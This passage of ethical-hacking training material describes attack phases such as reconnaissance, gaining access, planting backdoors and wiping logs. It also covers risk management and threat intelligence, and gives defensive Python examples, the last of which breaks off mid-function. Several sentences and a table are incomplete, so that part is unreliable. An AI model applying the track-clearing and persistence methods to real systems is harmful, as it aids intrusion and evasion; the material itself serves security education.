Reconnaissance refers to the preparatory phase in which an attacker gathers as much information as possible about the target prior to launching the attack. In this phase, the attacker draws on competitive intelligence to learn more about the target. It could be the future point of return, noted for ease of entry for an attack, when more about the target is known on a broad scale. The reconnaissance target range may include the target organization's clients, employees, operations, network, and systems.

This phase allows attackers to plan the attack. It may take some time as the attacker gathers as much information as possible. Part of this reconnaissance may involve social engineering. A social engineer is a person who convinces people to reveal information such as unlisted phone numbers, passwords, and other sensitive information. For instance, the hacker could call the target's Internet service provider and, using personal information previously obtained, convince the customer service representative that the hacker is actually the target, and in doing so, obtain even more information about the target.
Another reconnaissance technique is dumpster diving. Dumpster diving is, simply enough, looking through an organization's trash for any discarded sensitive information. Attackers can use the Internet to obtain information such as employees' contact information, business partners, technologies currently in use, and other critical business knowledge. Dumpster diving may provide attackers with even more sensitive information, such as usernames, passwords, credit card statements, bank statements, ATM receipts, Social Security numbers, private telephone numbers, checking account numbers, or other sensitive data. Searching for the target company's web site in the Internet's Whois database can easily provide hackers with the company's IP addresses, domain names, and contact information.
Reconnaissance Types

Reconnaissance techniques are broadly categorized into active and passive. When an attacker is using passive reconnaissance techniques, they do not interact with the target directly. Instead, the attacker relies on publicly available information, news releases, or other no-contact methods. Active reconnaissance techniques, on the other hand, involve direct interactions with the target system by using tools to detect open ports, accessible hosts, router locations, network mapping, details of operating systems, and applications. Attackers use active reconnaissance when there is a low probability of the detection of these activities. For example, they may make telephone calls to the help desk or technical department.

As an ethical hacker, it is important to be able to distinguish among the various reconnaissance methods and advocate preventive measures in the light of potential threats. Companies, on their part, must address security as an integral part of their business and operational strategies, and be equipped with the proper policies and procedures to check for potential vulnerabilities.
Slide: Hacking Phase: Scanning. Pre-attack phase: scanning refers to the pre-attack phase in which the attacker scans the network for specific information based on the information gathered during reconnaissance; scanning can include the use of dialers, port scanners, network mappers, and vulnerability scanners. Extract information: attackers extract information such as live machines, port, port status, OS details, device type, and system uptime to launch an attack.
Hacking Phase: Scanning

Scanning is the phase immediately preceding the attack. Here, the attacker uses the details gathered during reconnaissance to scan the network for specific information. Scanning is a

Scanning can include the use of dialers, port scanners, network mappers, ping tools, vulnerability scanners, or other tools. Attackers extract information such as live machines, port, port status, OS details, device type, and system uptime to launch an attack.

Port scanners detect listening ports to find information about the nature of services running on the target machine. The primary defense technique against port scanners is shutting down services that are not required and implementing appropriate port filtering. However, attackers can still use tools to determine the rules implemented by the port filtering.
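The defensive side of this phase, as an added example that is not part of the CEH courseware: a detector that flags a source touching many distinct destination ports on one host within a short window, and counts how many of those attempts the port filter dropped. The log format, addresses, and sample lines are constructed for the example; the low-and-slow source shows the window-based approach's blind spot.

```python
"""Flagging port-scan activity in firewall logs.

Added example, not code from the CEH courseware. The log format and all
addresses below are constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed format: "<ISO timestamp> <ACCEPT|DROP> src=<ip> dst=<ip> dport=<port>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ACCEPT|DROP) src=(?P<src>[\d.]+) "
    r"dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)$"
)


def parse_line(line):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "action": m["action"],
        "src": m["src"],
        "dst": m["dst"],
        "dport": int(m["dport"]),
    }


def detect_port_scans(lines, window_seconds=60, threshold=15):
    """Return one alert per (src, dst) pair that hit at least `threshold`
    distinct ports inside some span no longer than `window_seconds`.
    The alert records the widest such span and how many attempts in it
    the port filter DROPped (a scanner probing filtered ports shows up
    mostly as drops)."""
    window = timedelta(seconds=window_seconds)
    per_pair = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev is not None:
            per_pair[(ev["src"], ev["dst"])].append(
                (ev["ts"], ev["dport"], ev["action"])
            )

    alerts = []
    for (src, dst), events in per_pair.items():
        events.sort()
        best = None
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until the span fits the window.
            while events[end][0] - events[start][0] > window:
                start += 1
            span = events[start:end + 1]
            ports = {p for _, p, _ in span}
            if len(ports) < threshold:
                continue
            if best is None or len(ports) > best["distinct_ports"]:
                best = {
                    "src": src,
                    "dst": dst,
                    "distinct_ports": len(ports),
                    "dropped": sum(1 for _, _, a in span if a == "DROP"),
                    "first": span[0][0],
                    "last": span[-1][0],
                }
        if best is not None:
            alerts.append(best)
    return alerts


def constructed_sample():
    """Constructed log: a benign client, a noisy scanner, and a slow scanner."""
    base = datetime(2024, 5, 1, 10, 0, 0)
    lines = []
    # Benign client: five HTTPS connections, a single port.
    for i in range(5):
        t = (base + timedelta(seconds=10 * i)).isoformat()
        lines.append(f"{t} ACCEPT src=198.51.100.7 dst=192.0.2.10 dport=443")
    # Noisy scanner: 25 ports in 25 seconds; only 22 and 25 are open.
    for i, port in enumerate(range(20, 45)):
        action = "ACCEPT" if port in (22, 25) else "DROP"
        t = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{t} {action} src=203.0.113.5 dst=192.0.2.10 dport={port}")
    # Low-and-slow scanner: 10 ports, one per minute, under the 60 s window.
    for i, port in enumerate(range(8000, 8010)):
        t = (base + timedelta(minutes=i)).isoformat()
        lines.append(f"{t} DROP src=203.0.113.9 dst=192.0.2.10 dport={port}")
    return lines


if __name__ == "__main__":
    for alert in detect_port_scans(constructed_sample()):
        print(alert)
    # The slow scanner is only caught with a wider window and lower threshold.
    print(len(detect_port_scans(constructed_sample(), 900, 10)))
```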
Slide: Hacking Phase: Gaining Access. Examples include password cracking and hacking at the system, application, or network levels.
Hacking Phase: Gaining Access

This is the phase in which real hacking occurs. Attackers use vulnerabilities identified during the reconnaissance and scanning phases to gain access to the target system and network. Gaining access refers to the point where the attacker obtains access to the operating system or to applications on the computer or network. The attacker can gain access at the operating system, application, or network level. Even though attackers can cause plenty of damage without gaining any access to the system, the impact of unauthorized access is catastrophic. For instance, external denial-of-service attacks can either exhaust resources or stop services from running on the target system. Ending processes can stop a service, using a logic bomb or time bomb, or even reconfigure and crash the system. Furthermore, attackers can exhaust system and network resources by consuming all outgoing communication links.

Attackers gain access to the target system locally (offline), over a LAN, or the Internet. Examples include password cracking, stack-based buffer overflows, denial-of-service, and session hijacking. Using a technique called spoofing to exploit the system by pretending to be a legitimate user or different system, attackers can send a data packet containing a bug to the target system in order to exploit a vulnerability. Packet flooding also breaks the availability of essential services. Smurf attacks attempt to cause users on a network to flood each other with data, making it appear as if everyone is attacking each other, and leaving the hacker anonymous.

A hacker's chances of gaining access to a target system depend on several factors such as the architecture and configuration of the target system, the skill level of the perpetrator, and the initial level of access obtained. Once an attacker gains access to the target system, they then try to escalate privileges in order to take complete control. In the process, they also compromise the intermediate systems that are connected to it.
Slide: Hacking Phase: Maintaining Access. Maintaining access refers to the phase when the attacker tries to retain their ownership of the system; attackers can upload, download, or manipulate data, applications, and configurations on the owned system, and use the compromised system to launch further attacks.
Hacking Phase: Maintaining Access

Maintaining access refers to the phase when the attacker tries to retain his or her ownership of the system. Once an attacker gains access to the target system with admin or root-level privileges (thus owning the system), they can use both the system and its resources at will. The attacker can either use the system as a launchpad to scan and exploit other systems or keep a low profile and continue their exploitation. Both of these actions can cause a great amount of damage. For instance, the hacker could implement a sniffer to capture all network traffic, including Telnet and FTP (file transfer protocol) sessions with other systems, and then transmit that data wherever they please.

Attackers who choose to remain undetected remove evidence of their entry and install a backdoor or a trojan to gain repeat access. They can also install rootkits at the kernel level to gain full administrative access to the target computer. Rootkits gain access at the operating system level, while trojans gain access at the application level. Both rootkits and trojans require users to install them locally. In Windows systems, most trojans install themselves as a service and run as part of the local system with administrative access.

Attackers can upload, download, or manipulate data, applications, and configurations on the owned system and can also use trojans to transfer usernames, passwords, and any other information stored on the system. They can maintain control over the system for a long time by closing up vulnerabilities to prevent other hackers from taking control of them, and sometimes, in the process, render some degree of protection to the system from other attacks. Attackers use the compromised system to launch further attacks.
Slide: Hacking Phase: Clearing Tracks. Clearing tracks refers to the activities carried out by an attacker to hide malicious acts; the attacker's intentions include continuing access to the victim's system, remaining unnoticed and uncaught, and deleting evidence that might lead to their prosecution; the attacker overwrites the server, system, and application logs to avoid suspicion.
Hacking Phase: Clearing Tracks

For obvious reasons, such as avoiding legal trouble and maintaining access, attackers will usually attempt to erase all evidence of their actions. Clearing tracks refers to the activities carried out by an attacker to hide malicious acts. The attacker's intentions include continuing access to the victim's system, remaining unnoticed and uncaught, and deleting evidence that might lead to their own prosecution. They use utilities such as PsTools (https://docs.microsoft.com), Netcat, or trojans to erase their footprints from the system's log files. Once the trojans are in place, the attacker has most likely gained total control of the system and can execute scripts in the trojan or rootkit to replace the critical system and log files to hide their presence in the system. Attackers always cover their tracks to hide their identity. Other techniques include steganography and tunneling. Steganography is the process of hiding data in other data, for instance, in image and sound files. Tunneling takes advantage of the transmission protocol by carrying one protocol over another. Attackers can use even a small amount of extra space in the data packet's TCP and IP headers to hide information. An attacker can use the compromised system to launch new attacks against other systems or as a means of reaching another system on the network undetected. Thus, this phase of the attack can turn into another attack's reconnaissance phase. System administrators can deploy host-based IDS (intrusion detection systems) and antivirus software in order to detect trojans and other seemingly compromised files and directories. An ethical hacker must be aware of the tools and techniques that attackers deploy so that they can advocate and implement the countermeasures detailed in subsequent modules.
Module Flow (slide): Hacking Concepts; Ethical Hacking Concepts; Information Security Laws and Standards.

Ethical Hacking Concepts

An ethical hacker follows processes similar to those of a malicious hacker. The steps to gain and maintain access to a computer system are similar irrespective of the hacker's intentions. This section provides an overview of ethical hacking, why ethical hacking is necessary, the scope and limitations of ethical hacking, and the skills of an ethical hacker.
Slide: What is Ethical Hacking? Ethical hacking involves the use of hacking tools, tricks, and techniques to identify vulnerabilities and ensure system security. It focuses on simulating the techniques used by attackers to verify the existence of exploitable vulnerabilities in a system's security. Ethical hackers perform security assessments for an organization with the permission of the concerned authorities.
What is Ethical Hacking?

Ethical hacking is the practice of employing computer and network skills in order to assist organizations in testing their network security for possible loopholes and vulnerabilities. White Hats (also known as security analysts or ethical hackers) are the individuals or experts who perform ethical hacking. Nowadays, most organizations (such as private companies, universities, and government organizations) are hiring White Hats to assist them in enhancing their cybersecurity. They perform hacking in ethical ways, with the permission of the network or system owner and without the intention to cause harm. Ethical hackers report all vulnerabilities to the system and network owner for remediation, thereby increasing the security of an organization's information system. Ethical hacking involves the use of hacking tools, tricks, and techniques typically used by an attacker to verify the existence of exploitable vulnerabilities in system security.

Today, the term hacking is closely associated with illegal and unethical activities. There is continuing debate as to whether hacking can be ethical or not, given the fact that unauthorized access to any system is a crime. Consider the following definitions:
- The noun "hacker" refers to a person who enjoys learning the details of computer systems and stretching their capabilities.
- The verb "to hack" describes the rapid development of new programs or the reverse engineering of existing software to make it better or more efficient in new and innovative ways.
- The terms "cracker" and "attacker" refer to persons who employ their hacking skills for offensive purposes.
- The term "ethical hacker" refers to security professionals who employ their hacking skills for defensive purposes.

Most companies employ IT professionals to audit their systems for known vulnerabilities. Although this is a beneficial practice, crackers are usually more interested in using newer, lesser-known vulnerabilities, and so these by-the-numbers system audits do not suffice. A company needs someone who can think like a cracker, keep up with the newest vulnerabilities and exploits, and recognize potential vulnerabilities where others cannot. This is the role of the ethical hacker.

Ethical hackers usually employ the same tools and techniques as hackers, with the important exception that they do not damage the system. They evaluate system security, update the administrators regarding any discovered vulnerabilities, and recommend procedures for patching those vulnerabilities. The important distinction between ethical hackers and crackers is consent. Crackers attempt to gain unauthorized access to systems, while ethical hackers are always completely open and transparent about what they are doing and how they are doing it. Ethical hacking is, therefore, always legal.
Slide: Why Ethical Hacking is Necessary. To beat a hacker, you need to think like one! Ethical hacking is necessary as it allows for counterattacks against malicious hackers through anticipating the methods used to break into the system. Reasons why organizations recruit ethical hackers: to prevent hackers from gaining access to the organization's information systems; to uncover vulnerabilities and explore their potential as a security risk; to analyze and strengthen an organization's security posture; to help safeguard customer data.

Slide: Why Ethical Hacking is Necessary (Cont'd). Ethical hackers try to answer the following questions: What can an intruder see on the target system? (Reconnaissance and Scanning phases); What can an intruder do with that information? (Gaining and Maintaining Access phases); Does anyone at the target organization notice the intruder's attempts or successes? (Reconnaissance and Covering Tracks phases); Are all the components of the information system adequately protected, updated, and patched?
outside attack. As hacking involves creative thinking, vulnerability testing and security audits alone cannot ensure that the network is secure. To achieve security, organizations must implement a "defense-in-depth" strategy by penetrating their networks to estimate and expose vulnerabilities.

Reasons why organizations recruit ethical hackers:
- To prevent hackers from gaining access to the organization's information systems
- To uncover vulnerabilities in systems and explore their potential as a security risk
- To analyze and strengthen an organization's security posture, including policies, network protection infrastructure, and end-user practices
- To provide adequate preventive measures in order to avoid security breaches
- To help safeguard the customer data
- To enhance security awareness at all levels in a business
An ethical hacker's evaluation of a client's information system security seeks to answer three basic questions:

1. What can an attacker see on the target system?
   Normal security checks by system administrators will often overlook vulnerabilities. The ethical hacker has to think about what an attacker might see during the reconnaissance and scanning phases of an attack.

2. What can an intruder do with that information?
   The ethical hacker must discern the intent and purpose behind attacks to determine appropriate countermeasures. During the gaining-access and maintaining-access phases of an attack, the ethical hacker needs to be one step ahead of the hacker in order to provide adequate protection.

3. Are the attackers' attempts being noticed on the target systems?
   Sometimes attackers will try to breach a system for days, weeks, or even months. Other times they will gain access but will wait before doing anything damaging. Instead, they will take the time to assess the potential use of exposed information. During the reconnaissance and covering tracks phases, the ethical hacker should notice and stop the attack.

After carrying out attacks, hackers may clear their tracks by modifying log files and creating backdoors, or by deploying trojans. Ethical hackers must investigate whether such activities have been recorded and what preventive measures have been taken. This not only provides them with an assessment of the attacker's proficiency but also gives them insight into the existing security measures of the system being evaluated. The entire process of ethical hacking and subsequent patching of discovered vulnerabilities depends on questions such as:
- What is the organization trying to protect?
- Against whom or what are they trying to protect it?
- Are all the components of the information system adequately protected, updated, and patched?
- How much time, effort, and money is the client willing to invest to gain adequate protection?
- Do the information security measures comply with industry and legal standards?

Sometimes, in order to save on resources or prevent further discovery, the client might decide to end the evaluation after the first vulnerability is found; therefore, it is important that the ethical hacker and the client work out a suitable framework for investigation beforehand. The client must be convinced of the importance of these security exercises through concise descriptions of what is happening and what is at stake. The ethical hacker must also remember to convey to the client that it is never possible to guard systems completely, but that they can always be improved.
Slide: Scope and Limitations of Ethical Hacking. Scope: ethical hacking is a crucial component of risk assessment, auditing, counter fraud, and information systems security best practices; it is used to identify risks and highlight remedial actions. Limitations: unless the businesses already know what they are looking for and why they are hiring an outside vendor, there is not much to gain; an ethical hacker can only help the organization to better understand its security system; it is up to the organization to place the right safeguards.
Security experts broadly categorize computer crimes into two categories: crimes facilitated by a computer and those in which the computer is the target.

Ethical hacking is a structured and organized security assessment, usually as part of a penetration test or security audit, and is a crucial component of risk assessment, auditing, counter fraud, and information systems security best practices. It is used to identify risks and highlight remedial actions. It is also used to reduce Information and Communications Technology (ICT) costs by resolving vulnerabilities.

Ethical hackers determine the scope of the security assessment according to the client's security concerns. Many ethical hackers are members of a "Tiger Team." A tiger team works together to perform a full-scale test covering all aspects of the network, as well as physical and system intrusion.

An ethical hacker should know the penalties of unauthorized hacking into a system. No ethical hacking activities associated with a network-penetration test or security audit should begin before receiving a signed legal document giving the ethical hacker express permission to perform the hacking activities from the target organization. Ethical hackers must be judicious with their hacking skills and recognize the consequences of misusing those skills.

The ethical hacker must follow certain rules to fulfill their ethical and moral obligations. They must do the following:
- Gain authorization from the client and have a signed contract giving the tester permission to perform the test.
- Maintain confidentiality when performing the test and follow a Nondisclosure Agreement (NDA) with the client for the confidential information disclosed during the test. The information gathered might contain sensitive information, and the ethical hacker must not disclose any information about the test or the confidential company data to a third party.
- Perform the test up to but not beyond the agreed-upon limits. For example, ethical hackers should perform DoS attacks only if they have previously agreed upon this with the client. Loss of revenue, goodwill, and worse consequences could befall an organization whose servers or applications are unavailable to customers because of the testing.
The following steps provide a framework for performing a security audit of an organization, which will help in ensuring that the test is organized, efficient, and ethical:
- Talk to the client and discuss the needs to be addressed during the testing
- Prepare and sign NDA documents with the client
- Organize the ethical hacking team and prepare the schedule for testing
- Conduct the test
- Analyze the results of the testing and prepare a report
- Present the report findings to the client

However, there are limitations too. Unless the businesses first know what they are looking for and why they are hiring an outside vendor to hack their systems in the first place, chances are there would not be much to gain from the experience. An ethical hacker, thus, can only help the organization to better understand its security system. It is up to the organization to place the right safeguards on the network.
Slide: Skills of an Ethical Hacker: technical skills and non-technical skills.

Skills of an Ethical Hacker

It is essential for an ethical hacker to acquire the knowledge and skills to become an expert hacker and to use this knowledge in a lawful manner. The technical and non-technical skills to be a good ethical hacker are discussed below:

Technical Skills
- In-depth knowledge of major operating environments, such as Windows, Unix, Linux, and Macintosh
- In-depth knowledge of networking concepts, technologies, and related hardware and software
- A computer expert adept at technical domains
- The knowledge of security areas and related issues
- High technical knowledge of how to launch sophisticated attacks

Non-Technical Skills
- The ability to quickly learn and adapt new technologies
- A strong work ethic and good problem solving and communication skills
- Commitment to an organization's security policies
- An awareness of local standards and laws
Module Flow (slide): Information Security Overview; Cyber Kill Chain Concepts; Hacking Concepts; Ethical Hacking Concepts; Information Security Controls.

Information Security Controls

Information security controls prevent the occurrence of unwanted security events and reduce risk to the organization's information assets. The basic security concepts critical to information on the Internet are confidentiality, integrity, and availability; the concepts related to the persons accessing the information are authentication, authorization, and non-repudiation. Information is the greatest asset of an organization. It must be secured using various policies, creating awareness, employing security mechanisms, or by other means.

This section deals with Information Assurance (IA), defense-in-depth, risk management, cyber threat intelligence, threat modeling, incident management, and AI and ML concepts.
Slide: Information Assurance (IA). IA refers to the assurance that the integrity, confidentiality, availability, and authenticity of information and information systems is protected during the use, processing, storage, and transmission of information. Some of the processes that help in achieving information assurance include developing local policy, process, and guidance; designing a network and user authentication strategy; identifying network vulnerabilities and threats; identifying problems and resource requirements; creating a plan for identified resource requirements; and applying appropriate information assurance controls.
Information Assurance (IA)

IA refers to the assurance of the integrity, availability, confidentiality, and authenticity of information and information systems during the usage, processing, storage, and transmission of information. Security experts accomplish information assurance with the help of physical, technical, and administrative controls. Information Assurance and Information Risk Management (IRM) ensure that only authorized personnel access and use information. This helps in achieving information security and business continuity.

Some of the processes that help in achieving information assurance include:
- Developing local policy, process, and guidance in such a way as to maintain the information systems at an optimum security level
- Designing a network and user authentication strategy—Designing a secure network ensures the privacy of user records and other information on the network. Implementing an effective user authentication strategy secures the information system's data
- Identifying network vulnerabilities and threats—Vulnerability assessments outline the security posture of the network. Performing vulnerability assessments in search of network vulnerabilities and threats helps to take the proper measures to overcome them
- Identifying problems and resource requirements
- Creating a plan for identified resource requirements
- Applying appropriate information assurance controls
- Providing information assurance training to all personnel in federal and private organizations brings among them an awareness of information technology
Slide: Defense-in-Depth. Defense-in-depth is a security strategy in which several protection layers are placed throughout an information system. It helps prevent direct attacks against the system and its data because a break in one layer only leads the attacker to the next layer. (Figure: layers of defense.)
Defense-in-Depth

Defense-in-depth is a security strategy in which security professionals use several protection layers throughout an information system. This strategy uses the military principle that it is more difficult for an enemy to defeat a complex and multi-layered defense system than to penetrate a single barrier. Defense-in-depth helps to prevent direct attacks against an information system and its data because a break in one layer only leads the attacker to the next layer. If a hacker gains access to a system, defense-in-depth minimizes any adverse impact and gives administrators and engineers time to deploy new or updated countermeasures to prevent recurrence of the intrusion.

Figure 1.3: Defense-in-Depth Layers
Slide: What is Risk? Risk refers to the degree of uncertainty or expectation that an adverse event may cause damage to the system. Risk levels: risks are categorized into different levels according to their estimated impact on the system. Risk matrix: a risk matrix is used to scale the risk by considering the probability or likelihood and the consequence or impact of the risk.
What is Risk?

Risk refers to the degree of uncertainty or expectation of potential damage that an adverse event may cause to the system or its resources, under specified conditions. Alternatively, risk can also be:
- The probability of the occurrence of a threat or an event that will damage, cause loss to, or have other negative impacts on the organization, either from internal or external liabilities.
- The loss of value to the asset or to its stakeholders as the consequence of an adverse event.

IT risk can be expanded to:

RISK = Threat x Vulnerability x Asset Value
Risk Level

Risk level is an assessment of the resulting impact on the network. Various methods exist to differentiate the risk levels depending on the risk frequency and severity. One of the common methods used to classify risks is to develop a two-dimensional matrix.

Working out the frequency or probability of an incident happening (likelihood) and its possible consequences is necessary to analyze risks. This is referred to as the level of risk. Risk can be represented and calculated using the following formula:

Level of Risk = Consequence x Likelihood

Risks are categorized into different levels according to their estimated impact on the system. Primarily, there are four risk levels, which include extreme, high, medium, and low levels. Remember that control measures may decrease the level of a risk, but do not always entirely eliminate the risk.

Risk Level | Consequence       | Action
Low        | Negligible danger | Take preventive steps to mitigate the effects of risk

Table 1.1: Risk Levels

Risk Matrix

The risk matrix scales the risk occurrence or likelihood probability, along with its consequences or impact. It is the graphical representation of risk severity and the extent to which the controls can or will mitigate it. The risk matrix is one of the simplest processes to use for increased visibility of risk; it contributes to the management's decision-making capability. The risk matrix defines various levels of risk and categorizes them as the product of negative probability and negative severity. Although there are many standard risk matrices, individual organizations must create their own.
Risk matrix (figure): probability levels (Very High, High, Equal, Low, Very Low) against consequence levels (including Major and Severe), with each cell rated Low, Medium, High, or Extreme.

Likelihood: The chance of the risk occurring.
Consequence: The severity of a risk event that occurs.

Note: This is an example of a risk matrix. Organizations must create individual risk matrices based on their business needs.
Slide: Risk Management. Risk management is the process of reducing and maintaining risk at an acceptable level by means of a well-defined and actively employed security program. Risk management phases: Risk Identification; Risk Assessment; Risk Treatment (selects and implements appropriate controls for the identified risks); Risk Tracking; Risk Review (evaluates the performance of the implemented risk management strategies).
Risk Management

Risk management is the process of identifying, assessing, responding to, and implementing the activities that control how the organization manages the potential effects of risk. It has a prominent place throughout the security life cycle and is a continuous and increasingly complex process. The types of risks vary from organization to organization, but the act of preparing a risk management plan is common to all organizations.

Risk Management Objectives
- Identify potential risks—this is the main objective of risk management
- Identify the impact of risks and help the organization develop better risk management strategies and plans
- Prioritize the risks, depending on the impact or severity of the risk, and use established risk management methods, tools, and techniques to assist in this task
- Understand and analyze the risks and report identified risk events
- Control the risk and mitigate its effect
- Create awareness among the security staff and develop strategies and plans for lasting risk management strategies

Risk management is a continuous process performed by achieving goals at every phase. It helps reduce and maintain risk at an acceptable level utilizing a well-defined and actively employed security program. This process is applied in all stages of the organization, for example, to specific network locations in both strategic and operational contexts.
The four key steps commonly termed as risk management phases are:
▪ Risk Identification
▪ Risk Assessment
▪ Risk Treatment
▪ Risk Tracking and Review

Every organization should follow the above steps while performing the risk management process.

▪ Risk Identification
The initial step of the risk management plan. Its main aim is to identify the risks—including the sources, causes, and consequences of the internal and external risks affecting the security of the organization—before they cause harm. The risk identification process depends on the skill set of the people, and it differs from one organization to another.

▪ Risk Assessment
This phase assesses the organization's risks and estimates the likelihood and impact of those risks. Risk assessment is an ongoing iterative process that assigns priorities for risk mitigation and implementation plans, which in turn help to determine the quantitative and qualitative value of risk. Every organization should adopt a risk evaluation process in order to detect, prioritize, and remove risks.
The risk assessment determines the kind of risks present, their likelihood and severity, and the priorities and plans for risk control. Organizations perform a risk assessment when they identify a hazard but are not able to control it immediately. A risk assessment is followed by a regular update of all information facilities.

▪ Risk Treatment
o The appropriate method of treatment
o The people responsible for the treatment
o The costs involved
o The benefits of treatment
o The likelihood of success
o Ways to measure and assess the treatment
▪ Risk Tracking and Review
An effective risk management plan requires a tracking and review structure to ensure effective identification and assessment of the risks as well as the use of appropriate controls and responses. The tracking and review process should determine the measures and procedures adopted and ensure that the information gathered to perform the assessment was appropriate. The review phase evaluates the performance of the implemented risk management strategies. Performing regular inspections of policies and standards, as well as regularly reviewing them, helps to identify the opportunities for improvement. Further, the monitoring process ensures that there are appropriate controls in place for the organization's activities and that all procedures are understood and followed.
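The four phases above can be carried through a small risk register. The following is an added illustration, not courseware from EC-Council: the 5x5 likelihood-by-impact scale, the three sample risks, the treatment options and the rule that picks a treatment when its expected benefit (benefit times likelihood of success) exceeds its cost are all constructed assumptions chosen to show the phases end to end.

```python
"""Worked risk register: identify -> assess -> treat -> track/review.

Added illustration (not from the CEH courseware). The 5x5 likelihood x impact
scale, the risk entries and the treatment options below are constructed
sample data; the cost/benefit rule is an assumption, not an EC-Council method.
"""
from dataclasses import dataclass, field

# Assumed qualitative scale: 1 (rare / negligible) .. 5 (almost certain / severe)
LEVELS = {"low": range(1, 6), "medium": range(6, 13), "high": range(13, 26)}


@dataclass
class Treatment:
    method: str                 # e.g. patch, encrypt, insure, accept
    owner: str                  # the person responsible for the treatment
    cost: float                 # the costs involved
    benefit: float              # expected loss avoided if the treatment succeeds
    success_likelihood: float   # the likelihood of success, 0..1


@dataclass
class Risk:
    name: str
    source: str                 # internal / external
    likelihood: int             # 1..5
    impact: int                 # 1..5
    treatments: list = field(default_factory=list)
    status: str = "identified"  # identified -> assessed -> treated -> reviewed

    @property
    def score(self) -> int:
        """Qualitative risk value: likelihood x impact (assumed scoring)."""
        return self.likelihood * self.impact

    @property
    def level(self) -> str:
        return next(k for k, r in LEVELS.items() if self.score in r)


def assess(register):
    """Risk assessment phase: prioritize the register by score, highest first."""
    for r in register:
        r.status = "assessed"
    return sorted(register, key=lambda r: r.score, reverse=True)


def choose_treatment(risk):
    """Risk treatment phase: pick the option whose expected benefit most
    exceeds its cost; None means no option pays off, so the risk is accepted
    and simply tracked."""
    best, best_net = None, 0.0
    for t in risk.treatments:
        net = t.benefit * t.success_likelihood - t.cost
        if net > best_net:
            best, best_net = t, net
    if best:
        risk.status = "treated"
    return best


def review(risk, new_likelihood, new_impact):
    """Tracking & review: re-score after treatment and report the residual risk."""
    before = risk.score
    risk.likelihood, risk.impact = new_likelihood, new_impact
    risk.status = "reviewed"
    return {"name": risk.name, "before": before, "after": risk.score, "level": risk.level}


# Constructed sample register
REGISTER = [
    Risk("Unpatched VPN gateway", "external", 4, 5, [
        Treatment("patch", "net-ops", cost=2_000, benefit=400_000, success_likelihood=0.9),
        Treatment("cyber insurance", "finance", cost=50_000, benefit=300_000, success_likelihood=0.6),
    ]),
    Risk("Laptop theft", "internal", 3, 2, [
        Treatment("full-disk encryption", "it-support", cost=5_000, benefit=20_000, success_likelihood=0.95),
    ]),
    Risk("Office printer firmware", "internal", 1, 1, [
        Treatment("replace fleet", "facilities", cost=30_000, benefit=500, success_likelihood=1.0),
    ]),
]

if __name__ == "__main__":
    for r in assess(REGISTER):
        t = choose_treatment(r)
        print(f"{r.name:28} score={r.score:2} {r.level:6} treat={t.method if t else 'accept'}")
```

Running the module prints the register in priority order; the printer risk scores 1 and no treatment pays off, so it stays on the register as an accepted risk to be tracked, while the VPN risk (score 20, high) gets the patch option because its expected benefit outweighs the cost by far more than insurance does.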
[Slide: Cyber Threat Intelligence. Cyber threat intelligence (CTI) is defined as the collection and analysis of information about threats and adversaries; it helps the organization identify and mitigate various business risks and build advanced and proactive defense strategies. Types of Threat Intelligence: Strategic, Tactical, Operational.]
Cyber Threat Intelligence

According to the Oxford dictionary, a threat is defined as “the possibility of a malicious attempt to damage or disrupt a computer network or system.” A threat is a potential occurrence of an undesired event that can eventually damage and interrupt the operational and functional activities of an organization. A threat can affect the integrity and availability factors of an organization. The impact of threats is very great and may affect the state of the physical IT assets in an organization. The existence of threats may be accidental, intentional, or due to the impact of some action.

Cyber threat intelligence, usually known as CTI, is the collection and analysis of information about threats and adversaries and the drawing up of patterns that provide an ability to make knowledgeable decisions for preparedness, prevention, and response actions against various cyberattacks. It is the process of recognizing or discovering any “unknown threats” that an organization may face so that necessary defense mechanisms can be applied to avoid such occurrences. It involves collecting, researching, and analyzing trends and technical developments in the field of cyber threats (including cybercrime, hacktivism, and espionage). Any knowledge about threats that results in an organization's planning and decision-making to handle it is a piece of threat intelligence. The main aim of CTI is to make the organization aware of existing or emerging threats and prepare them to develop a proactive cybersecurity posture in advance of exploitation. This process, where unknown threats are converted into possibly known ones, helps to anticipate the attack before it can happen, and ultimately results in a better and more secure system. Thus, threat intelligence is useful in achieving secure data sharing and global transactions among organizations.

Threat intelligence processes can be used to identify the risk factors that are responsible for malware attacks, SQL injections, web application attacks, data leaks, phishing, denial-of-service
attack, and other attacks. Such risks, after being filtered out, can be put on a checklist and handled appropriately.

Threat intelligence is beneficial for an organization to handle cyber threats with effective planning and execution. Along with a thorough analysis of the threat, CTI also strengthens the organization's defense system, creates awareness about impending risks, and aids in responding against such risks.
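The step just described, filtering intelligence into a checklist and handling what matches, looks like the following in practice. This is an added example, not code from the courseware: the indicator feed, the confidence threshold, the log line format and the sample log lines are all constructed for illustration (the addresses come from documentation ranges).

```python
"""Turning threat intelligence into a checklist and checking it against logs.

Added example, not from the CEH courseware. The indicator feed, the log
format, the log lines and the confidence threshold are constructed.
"""
import re
from collections import defaultdict

# Constructed indicator "feed": each entry names the risk it is tied to, so the
# organization can keep only the indicators that apply to it.
FEED = [
    {"type": "ip", "value": "203.0.113.45", "risk": "denial-of-service", "confidence": 90},
    {"type": "domain", "value": "login-examp1e.test", "risk": "phishing", "confidence": 85},
    {"type": "sha256", "value": "PLACEHOLDER_HASH", "risk": "malware", "confidence": 40},
    {"type": "ip", "value": "198.51.100.7", "risk": "web application attack", "confidence": 75},
]


def build_checklist(feed, min_confidence=60, applicable_risks=None):
    """Filter the feed into a checklist keyed by indicator type.

    Low-confidence entries are dropped, and when the organization lists the
    risk categories that apply to it, everything else is dropped too.
    """
    checklist = defaultdict(set)
    for ioc in feed:
        if ioc["confidence"] < min_confidence:
            continue
        if applicable_risks and ioc["risk"] not in applicable_risks:
            continue
        checklist[ioc["type"]].add(ioc["value"])
    return checklist


# Assumed log format: timestamp, client IP, requested host, path
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\d+\.\d+\.\d+\.\d+) (?P<host>\S+) (?P<path>\S+)$")


def scan_logs(lines, checklist):
    """Report every log line whose source IP or requested host is on the checklist."""
    hits = []
    for line in lines:
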